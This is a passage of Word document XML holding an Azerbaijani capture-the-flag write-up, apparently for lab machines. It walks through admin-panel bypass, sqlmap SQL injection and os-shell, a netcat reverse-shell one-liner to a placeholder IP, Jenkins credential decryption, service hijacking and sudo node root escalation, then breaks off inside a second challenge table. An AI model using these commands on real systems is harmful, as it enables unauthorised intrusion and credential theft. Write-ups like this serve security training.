                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1036862"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Admin panelinin açılması və istifadəçi siyahısının görünməsi. Bu, privilege bypass-in uğurlu olduğunu sübut edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="949136"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (10).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="949136"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Users List səhifəsində admin interfeysinin tam görünüşü. Buradan əlavə admin funksiyalarına keçmək mümkün olur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3176441"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (7).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3176441"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Product List və digər admin funksiyaları. Bu hissə sonradan SQL injection üçün maraqlı endpoint-lərin seçilməsinə kömək edir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="886163"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (9).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="886163"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ID əsasında istifadəçiyə admin hüququ verməyə çalışan funksiya. Bu parametrli sorğu injection üçün münasib hədəf kimi seçildi.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.3 SQL injection və verilənlər bazası çıxarışı</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addAdmin funksiyası Burp Suite ilə tutuldu və sqlmap vasitəsilə test edildi. Endpoint-in time-based, boolean-based və stacked query növlərinə həssas olduğu görüldü. Sonra public bazası və users cədvəli dump edildi, istifadəçi hash-ləri çıxarıldı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Admin panelinə daxil olduqdan sonra məqsəd tətbiq daxilində server tərəfli zəifliyin tapılması idi. Bunun səbəbi credential-ların, hash-lərin və ya birbaşa kod icrasına aparan məlumatların verilənlər bazasından əldə edilə bilməsi idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sqlmap --method POST -u 'http://192.168.100.129:8000/admin/addAdmin' --data='{id:21}' --batch --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1982725"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (11).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1982725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Burp Suite üzərində addAdmin endpoint-inin sorğusu. Bu sorğuda ID parametri üzərindən injection mümkünlüyü test olunur.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4 SQLMap os-shell və istifadəçi səviyyəsində dayaq nöqtəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap-in os-shell funksiyası ilə postgres istifadəçisi altında komanda icrası əldə edildi. Ardınca reverse shell açıldı, shell interaktiv hala gətirildi və user1 bayrağı götürüldü. Sonra tətbiq qovluqları və sistem faylları enumerasiya edildi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Hash-lərin qırılması nəticə vermədiyi üçün növbəti məqsəd birbaşa komanda icrasına keçmək idi. Sistem üzərində shell almaq həm daxili enumerasiyanı sürətləndirir, həm də əlavə etimad zəncirini qurmağa imkan verir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sqlmap ... --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|sh -i 2&gt;&amp;1|nc &lt;IP&gt; &lt;PORT&gt; &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.5 Jenkins üzərindən git istifadəçisinə keçid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sistem daxilində Jenkins quruluşu araşdırıldı və Script Console-un işlədiyi müəyyən edildi. credentials.xml daxilində saxlanmış şifrələnmiş dəyər Groovy ilə deşifrə olundu və alınan parol ilə git istifadəçisinə SSH girişi mümkün oldu. Bunun nəticəsində user2 bayrağı əldə edildi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: İlkin shell əldə olunduqdan sonra məqsəd lateral hərəkət üçün yeni etimad nöqtələri tapmaq idi. Jenkins kimi CI/CD sistemləri adətən credential və deploy sirləri saxladığı üçün privilege chain-in vacib hissəsidir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Groovy Script Console üzərindən Jenkins secret-lərinin deşifrə edilməsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ssh git@&lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="2520236"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (12).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="2520236"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Jenkins Script Console vasitəsilə encrypted credential-ın deşifrə olunması. Bu addım ona görə seçildi ki, CI sistemi daxilində saxlanan sirlər adətən növbəti istifadəçiyə keçid verir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="3478329"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (13).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="3478329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>git istifadəçisi ilə SSH sessiyası və user2 bayrağı. Bu görüntü credential reuse / credential disclosure zəncirinin praktik nəticəsini göstərir.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.6 jenkins istifadəçisindən node istifadəçisinə keçid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>jenkins istifadəçisinin yalnız staging.service restart etmək səlahiyyəti vardı. pspy ilə proseslər izlənərkən bu servisin node istifadəçisi altında nodemon app.js işlətdiyi göründü. Nəticədə nodemon skripti reverse shell ilə əvəz edildi, servis yenidən başladıldı və node shell alındı. Bununla user3 bayrağı da götürüldü.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Daha yüksək imtiyaza və son istifadəçi bayraqlarına çatmaq üçün Jenkins istifadəçisinin sudo hüquqları araşdırıldı. Məqsəd bir xidmət restart səlahiyyətinin dolayı yolla başqa istifadəçi altında kod icrasına çevrilib-çevrilmədiyini yoxlamaq idi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pspy64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo /usr/bin/systemctl restart staging.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5394960" cy="1671910"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image (14).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5394960" cy="1671910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pspy nəticəsi. Burada staging.service restart olunduqda hansı prosesin hansı istifadəçi altında işə düşdüyü görünür və privilege chain-in məntiqi qurulur.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.7 Root escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sudo -l nəticəsində /usr/bin/node binarisinin root kimi parolsuz işə salına bildiyi görüldü. GTFOBins yanaşması ilə child_process üzərindən /bin/sh spawn edildi və root shell alındı. Ardınca root.txt oxunaraq challenge tamamlandı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Niyə bu addım seçildi: Son mərhələdə məqsəd sistem üzərində tam nəzarət almaq idi. Bunun üçün node istifadəçisinin sudo hüquqları və GTFOBins kimi tanınmış escalation yolları yoxlanıldı.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:ind w:left="340" w:right="340"/>
        <w:shd w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CTF 2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hədəf tipi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Apache web server üzərində Linux host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Aşkarlanan portlar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>22/ssh, 80/http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>İlkin giriş</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>shell.php üzərindən cmd parametri ilə komanda icrası</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>İstifadəçi bayraqları</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>pred8or istifadəçisinin user1.txt faylı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Yekun imtiyaz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
